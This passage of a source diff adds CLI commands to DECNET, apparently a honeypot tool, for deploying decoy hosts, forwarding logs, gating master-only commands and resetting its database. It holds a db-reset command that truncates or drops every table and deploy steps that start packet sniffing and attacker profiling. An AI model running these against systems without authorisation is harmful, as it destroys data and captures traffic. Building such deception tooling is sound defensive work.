        from decnet.canary import worker as _worker
        if daemon:
            log.info("canary daemonizing")
            _utils._daemonize()
        log.info("canary starting")
        console.print("[bold cyan]Canary callback receiver starting[/]")
        try:
            asyncio.run(_worker.run())
        except KeyboardInterrupt:
            console.print("\n[yellow]Canary worker stopped.[/]")
    @app.command(name="canary-install-toolchain")
    def canary_install_toolchain(
        npm_bin: str = typer.Option(
            "npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
        ),
    ) -> None:
        """Install the Node-side toolchain used by fingerprint canaries.
        Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
        directory so the obfuscator's helper script can ``require()``
        ``javascript-obfuscator`` at mint time. Requires Node >= 18.
        Idempotent: re-running on an already-installed tree is fast
        (npm short-circuits when ``node_modules/`` is up-to-date).
        """
        import decnet.canary as _canary_pkg
        # npm runs inside the installed package directory, next to package.json.
        pkg_dir = Path(_canary_pkg.__file__).resolve().parent
        manifest = pkg_dir / "package.json"
        # Exit code 2: a precondition is missing (manifest or npm itself).
        if not manifest.is_file():
            console.print(
                f"[red]canary package.json not found under {pkg_dir}; "
                "wheel may be missing the JS toolchain payload.[/]"
            )
            raise typer.Exit(code=2)
        npm_path = shutil.which(npm_bin)
        if npm_path is None:
            console.print(
                f"[red]npm executable {npm_bin!r} not found on PATH. "
                "Install Node >= 18 and re-run.[/]"
            )
            raise typer.Exit(code=2)
        console.print(f"[cyan]installing canary toolchain[/] in {pkg_dir}")
        npm_argv = [npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"]
        try:
            result = subprocess.run(  # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
                npm_argv,
                cwd=str(pkg_dir),
                capture_output=True,
                text=True,
                timeout=_TOOLCHAIN_TIMEOUT_S,
                check=False,
            )
        except subprocess.TimeoutExpired:
            # Exit code 3 is reserved for the timeout case.
            console.print("[red]npm install timed out after 3 minutes[/]")
            raise typer.Exit(code=3) from None
        if result.returncode == 0:
            console.print("[green]canary toolchain ready[/]")
            return
        # Surface npm's stderr and propagate its return code unchanged.
        console.print(
            f"[red]npm install failed rc={result.returncode}[/]\n"
            f"{result.stderr.strip()}"
        )
        raise typer.Exit(code=result.returncode)
--- a/decnet/cli/db.py
+++ b/decnet/cli/db.py
@@ -0,0 +1,142 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from .utils import console, log
 def _decnet_tables() -> tuple[str, ...]:
    """Return the name of every DECNET-managed table, children before parents.
    The names come from ``SQLModel.metadata.sorted_tables`` — the same
    registry ``create_all`` uses — so a newly added model is picked up by
    ``db-reset`` automatically. (An earlier hardcoded list drifted several
    times and missed ``webhook_subscriptions`` / ``session_profile`` /
    ``smtp_targets``.)
    ``sorted_tables`` is parent-first, which is the safe order for
    ``CREATE``; it is reversed here because ``DROP`` needs children first
    so FK constraints go away before the tables they reference. The MySQL
    reset disables FK checks anyway, but the reversed order stays correct
    for backends that cannot do that.
    """
    from sqlmodel import SQLModel
    # Importing the models package is what registers the tables on the metadata.
    import decnet.web.db.models  # noqa: F401
    names = [tbl.name for tbl in SQLModel.metadata.sorted_tables]
    names.reverse()
    return tuple(names)
 async def _db_reset_mysql_async(dsn: str, mode: str, confirm: bool) -> None:
    """Report row counts for every DECNET table and, if confirmed, wipe them.
    Kept separate from the Typer command so tests can call it directly.
    Args:
        dsn: SQLAlchemy async URL of the MySQL database.
        mode: ``"truncate"`` issues TRUNCATE TABLE; any other value issues
            DROP TABLE.
        confirm: when false, only the summary table is printed (dry run).
    """
    from urllib.parse import urlparse
    from sqlalchemy import text
    from sqlalchemy.ext.asyncio import create_async_engine
    db_name = urlparse(dsn).path.lstrip("/") or "(default)"
    engine = create_async_engine(dsn)
    tables = _decnet_tables()
    try:
        # Pass 1: count rows per table; -1 marks a table that could not be queried.
        counts: dict[str, int] = {}
        async with engine.connect() as conn:
            for name in tables:
                try:
                    res = await conn.execute(text(f"SELECT COUNT(*) FROM `{name}`"))  # nosec B608
                    counts[name] = res.scalar() or 0
                except Exception:  # noqa: BLE001 — ProgrammingError for missing table varies by driver
                    counts[name] = -1
        summary = Table(title=f"DECNET MySQL reset — database `{db_name}` (mode={mode})")
        summary.add_column("Table", style="cyan")
        summary.add_column("Rows", justify="right")
        for name, n_rows in counts.items():
            cell = f"{n_rows:,}" if n_rows >= 0 else "[dim]missing[/]"
            summary.add_row(name, cell)
        console.print(summary)
        if not confirm:
            console.print(
                "[yellow]Dry-run only.  Re-run with [bold]--i-know-what-im-doing[/] "
                "to actually execute.[/]"
            )
            return
        # Pass 2: destructive statements, with FK checks disabled for the duration.
        async with engine.begin() as conn:
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 0"))
            for name in tables:
                # Skip tables the counting pass could not query.
                if counts.get(name, -1) >= 0:
                    if mode == "truncate":
                        statement = f"TRUNCATE TABLE `{name}`"
                        done_msg = f"[green]✓ TRUNCATE {name}[/]"
                    else:
                        statement = f"DROP TABLE `{name}`"
                        done_msg = f"[green]✓ DROP TABLE {name}[/]"
                    await conn.execute(text(statement))
                    console.print(done_msg)
            await conn.execute(text("SET FOREIGN_KEY_CHECKS = 1"))
        console.print(f"[bold green]Done. Database `{db_name}` reset ({mode}).[/]")
    finally:
        # Always release the engine, including on the dry-run early return.
        await engine.dispose()
 def register(app: typer.Typer) -> None:
    """Attach the ``db-reset`` command to *app*."""
    @app.command(name="db-reset")
    def db_reset(
        i_know: bool = typer.Option(
            False,
            "--i-know-what-im-doing",
            help="Required to actually execute. Without it, the command runs in dry-run mode.",
        ),
        mode: str = typer.Option(
            "truncate",
            "--mode",
            help="truncate (wipe rows, keep schema) | drop-tables (DROP TABLE for each DECNET table)",
        ),
        url: Optional[str] = typer.Option(
            None,
            "--url",
            help="Override DECNET_DB_URL for this invocation (e.g. when cleanup needs admin creds).",
        ),
    ) -> None:
        """Wipe the MySQL database used by the DECNET dashboard.
        Destructive. Runs dry by default — pass --i-know-what-im-doing to commit.
        Only supported against MySQL; refuses to operate on SQLite.
        """
        import asyncio
        import os
        # Argument and environment validation: both failures exit with code 2.
        valid_modes = ("truncate", "drop-tables")
        if mode not in valid_modes:
            console.print(f"[red]Invalid --mode '{mode}'. Expected: truncate | drop-tables.[/]")
            raise typer.Exit(2)
        db_type = os.environ.get("DECNET_DB_TYPE", "sqlite").lower()
        if db_type != "mysql":
            console.print(
                f"[red]db-reset is MySQL-only (DECNET_DB_TYPE='{db_type}'). "
                f"For SQLite, just delete the decnet.db file.[/]"
            )
            raise typer.Exit(2)
        # DSN precedence: --url, then DECNET_DB_URL, then build_mysql_url().
        dsn = url if url else os.environ.get("DECNET_DB_URL")
        if not dsn:
            from decnet.web.db.mysql.database import build_mysql_url
            try:
                dsn = build_mysql_url()
            except ValueError as err:
                console.print(f"[red]{err}[/]")
                raise typer.Exit(2) from err
        log.info("db-reset invoked mode=%s confirm=%s", mode, i_know)
        try:
            asyncio.run(_db_reset_mysql_async(dsn, mode=mode, confirm=i_know))
        except Exception as err:  # noqa: BLE001
            # Any failure during the reset itself maps to exit code 1.
            console.print(f"[red]db-reset failed: {err}[/]")
            raise typer.Exit(1) from err
--- a/decnet/cli/deploy.py
+++ b/decnet/cli/deploy.py
@@ -0,0 +1,308 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 from typing import Optional
 import typer
 from rich.table import Table
 from decnet.archetypes import Archetype, get_archetype
 from decnet.config import DecnetConfig
 from decnet.distros import get_distro
 from decnet.env import DECNET_API_HOST, DECNET_INGEST_LOG_FILE
 from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
 from decnet.ini_loader import load_ini
 from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
 from . import utils as _utils
 from .gating import _require_master_mode
 from .utils import console, log
 def _deploy_swarm(config: "DecnetConfig", *, dry_run: bool, no_cache: bool) -> None:
    """Spread deckies round-robin over the known workers and POST the plan to swarmctl.
    Workers are the hosts swarmctl reports as ``enrolled`` followed by those
    it reports as ``active``. A per-worker result table is printed afterwards.
    Raises:
        typer.Exit: code 1 when no worker is available or any result is not ok.
    """
    base = _utils._swarmctl_base_url(None)
    # Query both host states, enrolled first, and concatenate the answers.
    workers: list = []
    for host_state in ("enrolled", "active"):
        reply = _utils._http_request("GET", base + "/swarm/hosts?host_status=" + host_state)
        workers.extend(reply.json())
    if not workers:
        console.print("[red]No enrolled workers — run `decnet swarm enroll ...` first.[/]")
        raise typer.Exit(1)
    # Decky i is pinned to worker i modulo the number of workers.
    pinned: list = [
        decky.model_copy(update={"host_uuid": workers[pos % len(workers)]["uuid"]})
        for pos, decky in enumerate(config.deckies)
    ]
    config = config.model_copy(update={"deckies": pinned})
    payload = {"config": config.model_dump(mode="json"), "dry_run": dry_run, "no_cache": no_cache}
    console.print(f"[cyan]Dispatching {len(config.deckies)} deckies across {len(workers)} worker(s)...[/]")
    deploy_reply = _utils._http_request("POST", base + "/swarm/deploy", json_body=payload, timeout=900.0)
    results = deploy_reply.json().get("results", [])
    table = Table(title="SWARM deploy results")
    for heading in ("worker", "host_uuid", "ok", "detail"):
        table.add_column(heading)
    had_failure = False
    for entry in results:
        succeeded = bool(entry.get("ok"))
        had_failure = had_failure or not succeeded
        detail = entry.get("detail")
        # Dict details are reduced to their "status" field ("ok" if absent/empty).
        if isinstance(detail, dict):
            detail = detail.get("status") or "ok"
        ok_cell = "[green]yes[/]" if succeeded else "[red]no[/]"
        table.add_row(
            str(entry.get("host_name") or ""),
            str(entry.get("host_uuid") or ""),
            ok_cell,
            str(detail)[:80],
        )
    console.print(table)
    if had_failure:
        raise typer.Exit(1)
 def register(app: typer.Typer) -> None:
    @app.command()
    def deploy(
        mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
        deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
        interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
        subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
        ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
        services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
        randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
        distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
        randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Host path for the collector to write RFC 5424 logs (e.g. /var/log/decnet/decnet.log)"),
        archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
        mutate_interval: Optional[int] = typer.Option(30, "--mutate-interval", help="Automatically rotate services every N minutes"),
        dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
        no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
        parallel: bool = typer.Option(False, "--parallel", help="Build all images concurrently (enables BuildKit, separates build from up)"),
        ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
        config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
        api: bool = typer.Option(False, "--api", help="Start the FastAPI backend to ingest and serve logs"),
        api_port: int = typer.Option(8000, "--api-port", help="Port for the backend API"),
        daemon: bool = typer.Option(False, "--daemon", help="Detach to background as a daemon process"),
    ) -> None:
        """Deploy deckies to the LAN."""
        import os
        import subprocess  # nosec B404
        import sys
        from pathlib import Path as _Path
        _require_master_mode("deploy")
        if daemon:
            log.info("deploy daemonizing mode=%s deckies=%s", mode, deckies)
            _utils._daemonize()
        log.info("deploy command invoked mode=%s deckies=%s dry_run=%s", mode, deckies, dry_run)
        if mode not in ("unihost", "swarm"):
            console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
            raise typer.Exit(1)
        if config_file:
            try:
                ini = load_ini(config_file)
            except FileNotFoundError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
            iface = interface or ini.interface or detect_interface()
            subnet_cidr = subnet or ini.subnet
            effective_gateway = ini.gateway
            if subnet_cidr is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            elif effective_gateway is None:
                _, effective_gateway = detect_subnet(iface)
            host_ip = get_host_ip(iface)
            console.print(f"[dim]Config:[/] {config_file}  [dim]Interface:[/] {iface}  "
                          f"[dim]Subnet:[/] {subnet_cidr}  [dim]Gateway:[/] {effective_gateway}  "
                          f"[dim]Host IP:[/] {host_ip}")
            if ini.custom_services:
                from decnet.custom_service import CustomService
                from decnet.services.registry import register_custom_service
                for cs in ini.custom_services:
                    register_custom_service(
                        CustomService(
                            name=cs.name,
                            image=cs.image,
                            exec_cmd=cs.exec_cmd,
                            ports=cs.ports,
                        )
                    )
            effective_log_file = log_file
            try:
                decky_configs = build_deckies_from_ini(
                    ini, subnet_cidr, effective_gateway, host_ip, randomize_services, cli_mutate_interval=mutate_interval
                )
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)
        else:
            if deckies is None:
                console.print("[red]--deckies is required when --config is not used.[/]")
                raise typer.Exit(1)
            services_list = [s.strip() for s in services.split(",")] if services else None
            if services_list:
                known = set(all_service_names())
                unknown = [s for s in services_list if s not in known]
                if unknown:
                    console.print(f"[red]Unknown service(s): {unknown}. Available: {all_service_names()}[/]")
                    raise typer.Exit(1)
            arch: Archetype | None = None
            if archetype_name:
                try:
                    arch = get_archetype(archetype_name)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)
            if not services_list and not randomize_services and not arch:
                console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
                raise typer.Exit(1)
            iface = interface or detect_interface()
            if subnet is None:
                subnet_cidr, effective_gateway = detect_subnet(iface)
            else:
                subnet_cidr = subnet
                _, effective_gateway = detect_subnet(iface)
            host_ip = get_host_ip(iface)
            console.print(f"[dim]Interface:[/] {iface}  [dim]Subnet:[/] {subnet_cidr}  "
                          f"[dim]Gateway:[/] {effective_gateway}  [dim]Host IP:[/] {host_ip}")
            distros_list = [d.strip() for d in distro.split(",")] if distro else None
            if distros_list:
                try:
                    for slug in distros_list:
                        get_distro(slug)
                except ValueError as e:
                    console.print(f"[red]{e}[/]")
                    raise typer.Exit(1)
            ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
            decky_configs = build_deckies(
                deckies, ips, services_list, randomize_services,
                distros_explicit=distros_list, randomize_distros=randomize_distros,
                archetype=arch, mutate_interval=mutate_interval,
            )
            effective_log_file = log_file
        if api and not effective_log_file:
            effective_log_file = os.path.join(os.getcwd(), "decnet.log")
            console.print(f"[cyan]API mode enabled: defaulting log-file to {effective_log_file}[/]")
        config = DecnetConfig(
            mode=mode,
            interface=iface,
            subnet=subnet_cidr,
            gateway=effective_gateway,
            deckies=decky_configs,
            log_file=effective_log_file,
            ipvlan=ipvlan,
            mutate_interval=mutate_interval,
        )
        log.debug("deploy: config built deckies=%d interface=%s subnet=%s", len(config.deckies), config.interface, config.subnet)
        if mode == "swarm":
            _deploy_swarm(config, dry_run=dry_run, no_cache=no_cache)
            if dry_run:
                log.info("deploy: swarm dry-run complete, no workers dispatched")
            else:
                log.info("deploy: swarm deployment complete deckies=%d", len(config.deckies))
            return
        from decnet.engine import deploy as _deploy
        _deploy(config, dry_run=dry_run, no_cache=no_cache, parallel=parallel)
        if dry_run:
            log.info("deploy: dry-run complete, no containers started")
        else:
            log.info("deploy: deployment complete deckies=%d", len(config.deckies))
        if mutate_interval is not None and not dry_run:
            console.print(f"[green]Starting DECNET Mutator watcher in the background (interval: {mutate_interval}m)...[/]")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "mutate", "--watch"],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start mutator watcher.[/]")
        if effective_log_file and not dry_run and not api:
            _collector_err = _Path(effective_log_file).with_suffix(".collector.log")
            console.print(f"[bold cyan]Starting log collector[/] → {effective_log_file}")
            subprocess.Popen(  # nosec B603
                [sys.executable, "-m", "decnet.cli", "collect", "--log-file", str(effective_log_file)],
                stdin=subprocess.DEVNULL,
                stdout=open(_collector_err, "a"),
                stderr=subprocess.STDOUT,
                start_new_session=True,
            )
        if api and not dry_run:
            console.print(f"[green]Starting DECNET API on port {api_port}...[/]")
            _env: dict[str, str] = os.environ.copy()
            _env["DECNET_INGEST_LOG_FILE"] = str(effective_log_file or "")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "uvicorn", "decnet.web.api:app", "--host", DECNET_API_HOST, "--port", str(api_port)],
                    env=_env,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT
                )
                console.print(f"[dim]API running at http://{DECNET_API_HOST}:{api_port}[/]")
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROBER[/] (auto-discovers attackers from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "probe", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROBER.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-PROFILER[/] (builds attacker profiles from log stream)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "profiler", "--daemon"],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-PROFILER.[/]")
        if effective_log_file and not dry_run:
            console.print("[bold cyan]Starting DECNET-SNIFFER[/] (passive network capture)")
            try:
                subprocess.Popen(  # nosec B603
                    [sys.executable, "-m", "decnet.cli", "sniffer", "--daemon", "--log-file", str(effective_log_file)],
                    stdin=subprocess.DEVNULL,
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.STDOUT,
                    start_new_session=True,
                )
            except (FileNotFoundError, subprocess.SubprocessError):
                console.print("[red]Failed to start DECNET-SNIFFER.[/]")
--- a/decnet/cli/forwarder.py
+++ b/decnet/cli/forwarder.py
@@ -0,0 +1,75 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 from __future__ import annotations
 import asyncio
 import pathlib
 import signal
 from typing import Optional
 import typer
 from decnet.env import DECNET_INGEST_LOG_FILE
 from . import utils as _utils
 from .utils import console, log
 def register(app: typer.Typer) -> None:
    """Attach the ``forwarder`` command to *app*."""
    @app.command()
    def forwarder(
        master_host: Optional[str] = typer.Option(None, "--master-host", help="Master listener hostname/IP (default: $DECNET_SWARM_MASTER_HOST)"),
        master_port: int = typer.Option(6514, "--master-port", help="Master listener TCP port (RFC 5425 default 6514)"),
        log_file: Optional[str] = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Local RFC 5424 file to tail and forward"),
        agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent)"),
        state_db: Optional[str] = typer.Option(None, "--state-db", help="Forwarder offset SQLite path (default: <agent_dir>/forwarder.db)"),
        poll_interval: float = typer.Option(0.5, "--poll-interval", help="Seconds between log file stat checks"),
        daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
    ) -> None:
        """Run the worker-side syslog-over-TLS forwarder (RFC 5425, mTLS to master:6514)."""
        # Swarm modules are imported inside the command body, not at module
        # import time.
        from decnet.env import DECNET_SWARM_MASTER_HOST
        from decnet.swarm import pki
        from decnet.swarm.log_forwarder import ForwarderConfig, run_forwarder
        # An explicit --master-host wins; otherwise fall back to the env value.
        resolved_host = master_host or DECNET_SWARM_MASTER_HOST
        # Every precondition failure below exits with status 2.
        if not resolved_host:
            console.print("[red]--master-host is required (or set DECNET_SWARM_MASTER_HOST).[/]")
            raise typer.Exit(2)
        resolved_agent_dir = pathlib.Path(agent_dir) if agent_dir else pki.DEFAULT_AGENT_DIR
        # Only worker.crt is probed here; the rest of the bundle is not checked.
        if not (resolved_agent_dir / "worker.crt").exists():
            console.print(f"[red]No worker cert bundle at {resolved_agent_dir} — enroll from the master first.[/]")
            raise typer.Exit(2)
        if not log_file:
            console.print("[red]--log-file is required.[/]")
            raise typer.Exit(2)
        cfg = ForwarderConfig(
            log_path=pathlib.Path(log_file),
            master_host=resolved_host,
            master_port=master_port,
            agent_dir=resolved_agent_dir,
            # Left as None when --state-db is omitted; presumably the forwarder
            # then applies the <agent_dir>/forwarder.db default — TODO confirm.
            state_db=pathlib.Path(state_db) if state_db else None,
        )
        # Daemonize (if requested) before the asyncio event loop is created.
        if daemon:
            log.info("forwarder daemonizing master=%s:%d log=%s", resolved_host, master_port, log_file)
            _utils._daemonize()
        log.info("forwarder command invoked master=%s:%d log=%s", resolved_host, master_port, log_file)
        console.print(f"[green]Starting DECNET forwarder → {resolved_host}:{master_port} (mTLS)...[/]")
        async def _main() -> None:
            # SIGTERM / SIGINT set the stop event that is handed to run_forwarder.
            stop = asyncio.Event()
            loop = asyncio.get_running_loop()
            for sig in (signal.SIGTERM, signal.SIGINT):
                try:
                    loop.add_signal_handler(sig, stop.set)
                except (NotImplementedError, RuntimeError):  # pragma: no cover
                    # Handler could not be installed on this loop; carry on
                    # without it.
                    pass
            await run_forwarder(cfg, poll_interval=poll_interval, stop_event=stop)
        try:
            asyncio.run(_main())
        except KeyboardInterrupt:
            # Ctrl-C that reaches us as an exception ends the command quietly.
            pass
--- a/decnet/cli/gating.py
+++ b/decnet/cli/gating.py
@@ -0,0 +1,78 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Role-based CLI gating.
 MAINTAINERS: when you add a new Typer command (or add_typer group) that is
 master-only, register its name in MASTER_ONLY_COMMANDS / MASTER_ONLY_GROUPS
 below. The gate is the only thing that:
  (a) hides the command from `decnet --help` on worker hosts, and
  (b) prevents a misconfigured worker from invoking master-side logic.
 Forgetting to register a new command is a role-boundary bug. Grep for
 MASTER_ONLY when touching command registration.
 Worker-legitimate commands (NOT in these sets): agent, updater, forwarder,
 status, collect, probe, sniffer. Agents run deckies locally and should be
 able to inspect them + run the per-host microservices (collector streams
 container logs, prober characterizes attackers hitting this host, sniffer
 captures traffic). Mutator and Profiler stay master-only: the mutator
 orchestrates respawns across the swarm; the profiler rebuilds attacker
 profiles against the master DB (no per-host DB exists).
 """
 from __future__ import annotations
 import os
 import typer
 from .utils import console
 # Top-level command names that _gate_commands_by_mode() strips from the Typer
 # app when the host runs in gated agent mode.
 MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
    "api", "swarmctl", "deploy", "redeploy", "teardown",
    "mutate", "listener", "profiler",
    "services", "distros", "correlate", "archetypes", "web",
    "db-reset", "init", "webhook", "clusterer", "campaign-clusterer",
    # `ttp` runs on agents — local SMTP decoys persist .eml files into the
    # agent's artifacts tree and the EmailLifter disk-reaches them in-process
    # (DEBT-047). `ttp-backfill` stays master-only: it walks the master DB.
    "ttp-backfill",
 })
 # Sub-application (add_typer) group names stripped under the same condition.
 MASTER_ONLY_GROUPS: frozenset[str] = frozenset(
    {"swarm", "topology", "geoip", "realism"}
 )
 def _agent_mode_active() -> bool:
    """True when the host is configured as an agent AND master commands are
    disallowed (the default for agents). Workers overriding this explicitly
    set DECNET_DISALLOW_MASTER=false to opt into hybrid use."""
    mode = os.environ.get("DECNET_MODE", "master").lower()
    disallow = os.environ.get("DECNET_DISALLOW_MASTER", "true").lower() == "true"
    return mode == "agent" and disallow
 def _require_master_mode(command_name: str) -> None:
    """Abort with exit status 1 when a master-only command runs on a gated agent.

    Second line of defence behind _gate_commands_by_mode(): that function
    removes the commands from Typer's tables, while this check sits inside
    each command body so callers that import the function directly (tests,
    third-party tools) are stopped too.

    Args:
        command_name: Name shown to the operator after ``decnet``.

    Raises:
        typer.Exit: With code 1 when the agent gate is active.
    """
    if not _agent_mode_active():
        return
    refusal = (
        f"[red]`decnet {command_name}` is a master-only command; this host "
        f"is configured as an agent (DECNET_MODE=agent).[/]"
    )
    console.print(refusal)
    raise typer.Exit(1)
 def _gate_commands_by_mode(_app: typer.Typer) -> None:
    """Strip master-only commands and groups from *_app* on a gated agent.

    Does nothing unless _agent_mode_active() is true. Otherwise rewrites
    ``_app.registered_commands`` / ``_app.registered_groups`` in place,
    dropping every entry named in MASTER_ONLY_COMMANDS / MASTER_ONLY_GROUPS.

    Args:
        _app: The Typer application whose registration tables are filtered.
    """
    if not _agent_mode_active():
        return
    def _is_master_only(cmd) -> bool:
        # An explicit name= on the decorator is authoritative.
        if cmd.name:
            return cmd.name in MASTER_ONLY_COMMANDS
        if cmd.callback is None:
            return "" in MASTER_ONLY_COMMANDS
        raw = cmd.callback.__name__
        # Typer derives the CLI name from the function name by lowercasing it
        # and turning underscores into hyphens, so `def db_reset` is exposed
        # as `db-reset`. Compare the derived spelling as well as the raw one,
        # otherwise such a command slips through the gate.
        derived = raw.lower().replace("_", "-")
        return raw in MASTER_ONLY_COMMANDS or derived in MASTER_ONLY_COMMANDS
    _app.registered_commands = [
        c for c in _app.registered_commands
        if not _is_master_only(c)
    ]
    _app.registered_groups = [
        g for g in _app.registered_groups
        if g.name not in MASTER_ONLY_GROUPS
    ]
--- a/decnet/cli/geoip.py
+++ b/decnet/cli/geoip.py
@@ -0,0 +1,60 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """GeoIP CLI — refresh and lookup subcommands (master-only).
 Usage::
    decnet geoip refresh          # re-download RIR files and rebuild the index
    decnet geoip lookup 8.8.8.8   # one-shot IP -> country dump
 """
 from __future__ import annotations
 import typer
 from .gating import _require_master_mode
 from .utils import console, log
 # Sub-application holding the `geoip` subcommands; mounted by register().
 # no_args_is_help=True makes a bare `decnet geoip` print the help text.
 _group = typer.Typer(
    name="geoip",
    help="GeoIP provider management (master only).",
    no_args_is_help=True,
 )
@_group.command("refresh")
 def _refresh() -> None:
    """Force re-download of the GeoIP provider data and rebuild the index."""
    _require_master_mode("geoip refresh")
    from decnet.geoip import get_lookup
    from decnet.geoip.factory import get_provider
    provider = get_provider()
    log.info("geoip: forcing refresh via %s provider", provider.name)
    console.print(f"[bold cyan]Refreshing {provider.name} GeoIP data…[/]")
    try:
        lookup = get_lookup(force_refresh=True)
    except Exception as exc:  # noqa: BLE001
        console.print(f"[red]refresh failed: {exc}[/]")
        raise typer.Exit(1) from exc
    console.print(
        f"[green]OK[/] {provider.name} index rebuilt "
        f"({len(lookup)} ranges)."
    )
@_group.command("lookup")
 def _lookup(
    ip: str = typer.Argument(..., help="IP address to resolve."),
 ) -> None:
    """Print the country code for an IP (or 'unknown')."""
    _require_master_mode("geoip lookup")
    from decnet.geoip import enrich_ip
    cc, source = enrich_ip(ip)
    if cc is None:
        console.print(f"{ip} [yellow]unknown[/]")
        raise typer.Exit(0)
    console.print(f"{ip} [green]cc={cc}[/] source={source}")
 def register(app: typer.Typer) -> None:
    """Mount the ``geoip`` sub-application on *app* under the name ``geoip``."""
    app.add_typer(_group, name="geoip")
--- a/decnet/cli/init.py
+++ b/decnet/cli/init.py
@@ -0,0 +1,864 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """
 `decnet init` — one-shot master-host bootstrap.
 Idempotent: running it twice is a no-op on already-configured items.
 Takes a freshly ``pip install``'d DECNET and turns it into a ready-to-
 run master host: creates the ``decnet`` system user/group, installs
 the systemd units + polkit rule + tmpfiles.d entry, seeds the
 directory layout, drops a placeholder config, and starts the
 ``decnet.target`` grouping unit.
 Requires root. Uses ``subprocess.run`` (never ``shell=True``) for every
 privileged call so the full argv surface is auditable.
 """
 from __future__ import annotations
 import grp
 import hashlib
 import os
 import pwd
 import shutil
 import subprocess  # nosec B404
 import sys
 from pathlib import Path
 from typing import Callable, List, Optional
 import typer
 from jinja2 import Environment, FileSystemLoader, StrictUndefined
 import decnet as _decnet_pkg
 from .gating import _require_master_mode
 from .utils import console, log
 # Template for the placeholder config file. _ensure_config() renders it with
 # str.format(api_user=..., api_group=...), so any literal brace added to this
 # text must be doubled ({{ / }}).
 _CONFIG_PLACEHOLDER = """\
 # /etc/decnet/decnet.ini — DECNET host config.
 #
 # Every key is OPTIONAL. Absent keys fall through to env-var defaults
 # defined in decnet/env.py. Real env vars always win over this file
 # (precedence: env > INI > default), so systemd EnvironmentFile= and
 # one-off `DECNET_FOO=bar decnet ...` invocations always take effect.
 #
 # Secrets (JWT, admin password, DB password) intentionally DO NOT
 # live here. Put them in /opt/decnet/.env.local or the systemd
 # EnvironmentFile= — never in a group-readable INI.
 [decnet]
 # DECNET-service user/group as configured at `decnet init` time.
 # Resolved to a uid/gid on each host at deploy time via pwd.getpwnam,
 # so the same user name can have different numeric uids on master vs
 # agents without breaking artifact ownership.
 api-user = {api_user}
 api-group = {api_group}
 # mode = master                          # or "agent"
 # [api]
 # host = 127.0.0.1
 # port = 8000
 # [web]
 # host = 127.0.0.1
 # port = 8080
 # admin-user = admin
 # cors-origins = http://localhost:8080   # comma-separated
 # [database]
